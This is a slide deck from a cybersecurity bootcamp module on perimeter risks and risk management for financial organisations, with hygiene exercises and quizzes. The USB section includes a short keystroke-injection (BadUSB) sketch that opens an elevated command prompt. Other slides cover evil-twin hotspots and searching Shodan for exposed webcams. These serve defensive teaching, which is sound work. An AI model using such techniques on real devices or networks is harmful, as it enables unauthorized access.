Module 4

Cybersecurity Bootcamp | Module 4
Risk Management: Perimeter

of Exposure
Class Pointers
● Please switch on your webcams! Communication is 70% body language.

● This is not a webinar. This is an interactive, hands-on training workshop,
where everyone participates!
● Keep your mic constantly muted (to prevent background noise)
● Unmute your mic to speak up and ask questions
● Always clarify your doubts. Don’t be shy!
● Feel free to ask any questions. This is a safe zone for everyone, no matter
your starting level.
© 2022 Vertical Institute

Vertical Institute
Class Pointers
● Use the ‘Raise Hand’ or ‘Thumbs Up’ function!
Step 1:
Step 2:

Vertical Institute
Agenda
Tutorial
• Security risks and recommendations • Risk management
• Wireless • Importance of Cybersecurity Risk Assessment
• Mobile • Risk identification
• Laptop • Risk analysis
• USB device • Risk evaluation
• Web cameras • Vendors’ risk management
• Service providers’ risk management
• Insider threats’ risk management

Vertical Institute
Agenda
Activity
• Check for shared folders in computer
• Check for mobile application permission settings
• Update computers and mobile devices
• Enable antivirus and firewall on computers
• Determine cyber risks and responses for an organization

Vertical Institute
Cybersecurity risks examples to
financial services organizations
What are “Risk management is the identification, evaluation,
and prioritisation of risks followed by coordinated and
risks? economical application of resources to minimise,
monitor, and control the probability or impact of
unfortunate events or to maximise the realisation of
opportunities.”

Is crossing the road risky?
Real life
risks Is drinking the water risky?
Is doing activity A risky?

What are Cybersecurity Risks?
● Identification of disruptions that may negatively impact these IT assets

● What can disrupt Confidentiality, Integrity and Availability?

Remember we learned about CIA?
Cybersecurity Risk Examples to financial services
organisations
● Confidentiality of information
○ Only you can access your bank account statements
● Integrity of information
○ Bank account statement not changed without your approval
● Availability of services
○ Able to access the banking services without disruption

Security risks and
recommendations relating to
financial services
Is joining free ● Safe
WiFis safe? ● Not safe

Wireless
Security ● Securing the use of wireless connections

Wireless Access • WiFi is another form of wireless connection to the
Points internet.
• Like any connection to the internet, it includes
definite threats.

Wireless Risks
Risks include:
• Insecure WiFi connections and Public WiFi
• Accessing fake access points
• Using default or weak Wireless Access Points’ passwords

Is public
Wi-Fi Safe?
https://www.tnp.sg/news/singapore/think-your-phone-safe-public-wi-fi-think-again

The most dangerous type of WiFi networks
Unsecured WiFi connection is a network that
doesn’t require a password and doesn’t protect the
traffic inside it. Most of the time these connections
are provided as a service for customers like in an
Wireless airport terminal, cafes or malls.
Hacking Although many of these networks have been

upgraded and now require a password and
support protection, there are still those that
remain unsecured.

Evil Twin
Fake Wireless Access Points

You can create fake WiFis too

What happens if
you change your ● Free Starbucks WiFi
● Wireless@SGX
mobile hotspot
● Free shopping mall WiFi
name to the ● Any other WiFis in the vicinity that you can copy
following?

Your devices
with wireless
access

Man in the middle attack
● Hacker can view all traffic routed to the website
● Usernames, passwords, credit card information, etc.

Vertical Institute
Remember Computer
Misuse Act?
Interception of traffic falls under Computer Misuse Act

Shared folders
Accessible by anyone in the same network

Exercise 1:
Check your shared
files and folders

Exercise 2: Check file and printer sharing when
connecting publicly
2
1

27
Exercise 2. Disable file and printer sharing when
connecting publicly
2
© 2022 Vertical Institute 24

Vertical Institute
1

Change Your Wireless Access Password

Mobile Always Keep
Track of Your
Screen Lock Enable Remote
Wiping
Always Update
Phone
Devices
Choose Mobile Do Not Jailbreak Disable
Apps From or Root Devices WiFi/Bluetooth
Trusted Source When Not In
Use

Mobile devices are minicomputers
Can be easily accessible from

a computer by removing the
hard drive of a cell phone.
Storage in mobile devices are

typically not encrypted

Remote
wiping

• Disable Wi-Fi when not in use
• Disable Bluetooth when not in use
Vertical Institute
• Hacking mobile devices by plugging phones into USB
Vertical Institute
Ransomware on mobile devices
• Never click on unverified links
• Do not open untrusted email attachments
• Only download from sites you trust
• Avoid giving out personal data
• Never use unfamiliar USBs
• Backup your data

Exercise: Update your mobile devices

▪App permissions
▪Body Sensors
Mobile App Permissions
▪Calendar
▪Camera
▪Contacts
▪Location
▪Microphone
▪Phone
▪SMS
▪Storage

Check Mobile App Permissions
Android:
Head to the Apps & notifications menu in
settings and find the Permissions option. If
this isn’t displayed on the main menu, it might
be tucked away in the hamburger icon in the
top right. From here, you can browse through
all the available permissions on your phone, as
well as a quick overview of how many apps
have been granted each permission.

Check Mobile App Permissions
iPhone:
• Head to the Apps & notifications menu in settings and find the Permissions option. If this isn’t displayed
on the main menu, it might be tucked away in the hamburger icon in the top right. From here, you can browse through
all the available permissions on your phone, as well as a quick overview of how many apps have been granted each
permission.
https://www.digitaltrends.com/mobile/ho
w-to-control-ios-app-permissions/

Mobile Hacking Demo
Mobile Devices
Work Profile
Separate work apps and data from personal apps and data

Mobile Devices Security for Financial
Services Organisations
● Financial services company should make it compulsory for their employees to deploy
work profiles to minimise exposure of hacked devices from accessing work data
○ For example, if an employee downloads a rogue application, that rogue application
should not have the permissions to access work data
● Financial services company should ensure that their mobile banking app downloaded by
their customers are restricted for use only if the device is not rooted
○ Rooted devices allow hackers to have deeper access into the phone than
otherwise capable

Laptop
Always Keep Screen Lock Always Update

Track of Your
Laptop
Download Only Disable

From Trusted WiFi/Bluetooth
Source When Not In Use

Laptops can be accessed without username and password
● Laptop’s hard drive can be taken out of the laptop and plugged into a separate
computer for access
● Find your laptop software

Exercise: Update all your computers

Exercise: Update all your computers
3
2

Exercise. Enable windows defender
1
2

Exercise. Enable MAC firewall
1
2

Device Security for Financial Services Organisations
● Anti-virus to be provided by company for employees accessing corporate data from

their personal mobile devices
● Customers device should be checked for security configuration before access to the
mobile app is available

Universal Serial
Bus (USB)

How does USB hacking work?
#include "DigiKeyboard.h"
void setup()
{
// leave it empty
}void loop()
{
DigiKeyboard.delay(5000); // time is measured in milliseconds
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT); // open windows menu
DigiKeyboard.delay(1000);
DigiKeyboard.print(“cmd”); // to search for command prompt
DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;) { } // to stop executing the loop
}

Juice Jacking
https://www.nbcnews.com/tech/security/juice-jacking-why-you-should-avoid-public-phone-charging-stations-n1132046

Enable encryption on USB
Set password on sensitive

files in USB
USB Security
Practices Do not plug unknown USB devices
into your computers
Do not charge or plug your mobile

devices to unknown sources

USB Security for Financial
Services Organisations
● Use only company issued USB devices for work

● USB devices issued by companies usually have encryption and
password enabled by default

Webcameras

Update Webcameras

Set web camera password

Live Hacking Demo
How hackers hunt for web cameras
Smart TV
Smart Home Assistants
Other devices? Smart fridge
Smart home
Smart lock

Exploit-db ● Provided keywords for searching for
Internet-connected devices
● Webcameras, smart TVs, etc and even
mobile devices

Shodan ● Search engine for Internet of Things

Update Network Printers

Working from home
• Home devices generally have lower security posture than corporate issued devices
• Corporate issued devices are used at home allowing connections attempt from hacked
home devices

Risk Management
Risk Management
• Importance of Cybersecurity Risk Assessment

• Risk identification
• Risk analysis
• Risk evaluation
• Vendors’ risk management

Importance of Cybersecurity Risk Assessment
Threats are listed
Assets are listed
Vulnerabilities are listed
Most critical threats against most important

resources are handled

Risk identification
● Identifying your assets

○ What data do you hold?
○ What systems do you run?
○ What will happen if these assets go down?
● Identifying threats to assets
○ What are the threats to a bank’s website?
● Identifying vulnerabilities of assets
○ What are the vulnerabilities of a bank’s website?

Remember
Confidentiality,
Integrity and
Availability?
Risk identification examples for financial
services organisations
● You hold credit card numbers and personally identifiable information of customers: What will
happen if these data are exposed? (Confidentiality)
● You need to comply to regulatory requirements to have your systems up and running at
times: What will happen if your banking systems are disrupted? (Availability)
● You hold account balance information: What will happen if a hacker gain access into your
system and changes the amount out? (Integrity)

Threat modelling
• Identify Assets
• Create an Architecture Overview
• Decompose the Application
• Identify the Threats
• Document the Threats
Identifying • Rate the Threats
threats
STRIDE Model
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial of Service
• Elevation of Privilege

Identifying vulnerabilities
● Weaknesses in your overall environment that can be taken advantage of by a bad actor
● For example:
○ Weak passwords used by a newly launched website
○ Misconfiguration of a system that did not go through the review process
○ Scanner incorrectly identifying email from paper document

Risk analysis
Define impact to organization Now that we have identified our

assets and the possible threats, we
need to estimate the likely impact if
these threats go through.

Risk evaluation
Impact
Probability
Catastrophic: 5 Major: 4 Moderate: 3 Minor: 2 Negligible: 1
Frequent: 5 25 20 15 10 5
Occasional: 4 20 16 12 8 4
Remote: 3 15 12 9 6 3
Improbable: 2 10 8 6 4 2
Highly improbable: 1 5 4 3 2 1

Avoid the risk Do not take the risk
Share the risk with

Share the risk other team members,
organisations, etc.
How to manage
these risks? Go ahead with the
Accept the risk project knowing of the
risk and its cost
Reduce its impact

Control the risk • Preventative actions
• Detective actions

Vendor Inventory
• Who are my vendors?

• Vendor profiling
Vendors’ risk Service level agreement
management • What if my vendor’s systems are down? Do we have

a mapping between the SLAs with the vendor and the
SLAs I have with my customers?
Ongoing assessments
• Audits, Certifications and Attestations

Service providers’ risk management
# Question Response Remarks Ratings
Do you have an incident response management

1
team in place?
2 Do you have secure code scanning in place?
Do you regularly update your anti-virus in

3
your systems?
Are your procedures in place to protect against

4
zero-day exploits?

• How would a user turn rogue?
Insider threats’ risk • If a user turns rogue, how are you going to track
his/her behaviour and actions against the systems?
management • Do you have procedures in place to cut-off a user’s
access to the system if unauthorised attempts are
detected?
• Do you have alarms in place to notify the security
team of change in behaviour?

Insider threats’ risk management
● User Behaviour Analytics software

○ Tracks users’ activity across systems
■ Browser type, geo-location, mobile device type, screen resolution, typing
speed and more
● Logging
○ Analytics are based on logs available
● Integrated with access management systems
○ To block users upon detection of rogue activities
○ To challenge users with multi-factor authentication in event of credentials being
stolen and used by bad actors

Cybersecurity Policies
● Formalised in words so that employees can refer from

● Password policies
● Confidentiality of information
● Use only corporate USB drives
● Not sharing computers with other employees

Acceptable User
Policy Example https://www.amerisbank.com/AmerisBank/media/Do
cuments/Acceptable-Use-Policy.pdf

Cybersecurity Procedures
Background checks on education,

criminal records, referees, etc
Hiring
Sequence of activities to perform

a security task
Identity card Disposal of computers
Issued only upon approval by security Shredding hard disk drives

People, Process and Technology framework
People
• Are my users aware of
the latest threats?
• Are my customers aware
of phishing attacks?
Technology Process
• Am I equipped with the • Are processes in place
right technology to to safeguard data?
differentiate a user • Are there room for
from a hacker? improvement in my
process?

Guidelines on Risk Management Practices
– Internal Controls
https://www.mas.gov.sg/-/media/MAS/Regulations-and-Financial-Stability/Regulatory-and-Supervi
sory-Framework/Risk-Management/Internal-Control.pdf

Guidelines on Risk Management Practices
– Internal Controls
● Control Environment
● Business Process Controls
● Checklist of Sound Practices to Adopt (page 22 to 28)

Can cybersecurity technology help in Internal
Controls? Fraud monitoring
https://www.semanticscholar.org/paper/Credit-Card-Fraud-Detection-Using-Hidden-Markov-Srivastava-Kundu/841b8acad944c4cd0078fb9bac7ec3be85b607
figure/3

What have we learned today?
Tutorial
• Security risks and recommendations • Risk management
• Wireless • Importance of Cybersecurity Risk Assessment
• Mobile • Risk identification
• Laptop • Risk analysis
• USB device • Risk evaluation
• Web cameras • Vendors’ risk management

Vertical Institute
What have we learned today?
Activity
• Check for shared folders in computer
• Check for mobile application permission settings
• Update computers and mobile devices
• Enable antivirus and firewall on computers
• Determine cyber risks and responses for an organization

Vertical Institute
What is evil A. Fake wireless access point copying the correct
wireless access point
twin wireless B. Fake computer that looks like the same computer
attack? C. Fake mobile device that looks like the same
computer

What is evil A. Fake wireless access point copying the correct
wireless access point
twin wireless B. Fake computer that looks like the same computer
attack? C. Fake mobile device that looks like the same
computer

I need to update my computers, mobile
devices and internet connected devices
regularly
A. True
B. False

I need to update my computers, mobile
devices and internet connected devices
regularly
A. True
B. False

Connecting to free Wi-Fi is safe
A. True, because I can surf the internet freely
B. False, because hackers connected to the Wi-Fi
could be trying to get our information.

Connecting to free Wi-Fi is safe
A. True, because I can surf the internet freely
B. False, because hackers connected to the Wi-Fi
could be trying to get our information.

Take free USB sticks from e-commerce
purchases and plug into my computer
A. True
B. False

Take free USB sticks from e-commerce
purchases and plug into my computer
A. True
B. False

Shared folders may be accessible by
hackers through public Wi-Fi
A. True
B. False

Shared folders may be accessible by
hackers through public Wi-Fi
A. True
B. False

Plug my mobile phone into free
charging stations?
A. Yes
B. No

Plug my mobile phone into free
charging stations?
A. Yes
B. No

Thank You!

Module 4

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Module 4

Uploaded by

Copyright:

Available Formats

Cybersecurity Bootcamp | Module 4

Risk Management: Perimeter

● Please switch on your webcams! Communication is 70% body language.

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

Is doing activity A risky?

© 2022 Vertical Institute

● Identification of disruptions that may negatively impact these IT assets

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

Wireless airport terminal, cafes or malls.

Hacking Although many of these networks have been

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

Accessible by anyone in the same network

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute 24

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

Can be easily accessible from

Storage in mobile devices are

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

Always Keep Screen Lock Always Update

Download Only Disable

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

● Anti-virus to be provided by company for employees accessing corporate data from

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

© 2022 Vertical Institute

Set password on sensitive

Do not charge or plug your mobile

© 2022 Vertical Institute